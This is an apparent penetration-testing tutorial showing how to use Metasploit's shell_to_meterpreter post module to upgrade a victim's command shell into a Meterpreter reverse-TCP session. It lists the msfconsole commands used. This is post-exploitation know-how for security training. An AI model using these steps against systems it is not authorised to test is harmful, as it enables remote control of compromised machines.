In network penetration testing, we always wish to hack a system of an internal network and try to make an unauthorized access through meterpreter session using metasploit framework. But there are some exploits which provides directly victim’s command shell instead of meterpreter session. In this article we have tried to upgrade from victim’s shell to meterpreter shell.
In previous article we had discussed related to how to access victim’s shell. Now once you have access victims command shell then follow the given below step to upgrade a command shell into meterepreter shell.
Here I have already access command shell of victim’s Pc
msf auxiliary(telnet_login) >sessions
In following screenshot you can perceive that it is showing the TYPE for session 1: shell.
This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently meterpreter/reverse_tcp is used on Windows and Linux, with python/meterpreter/reverse_tcp’ used on all others.
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit
Let’s verify the TYPE for session 2
msf post(shell_to_meterpreter) >sessions
Now have a look over last image which is showing the new session i.e. session 2 is a meterpreter session.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here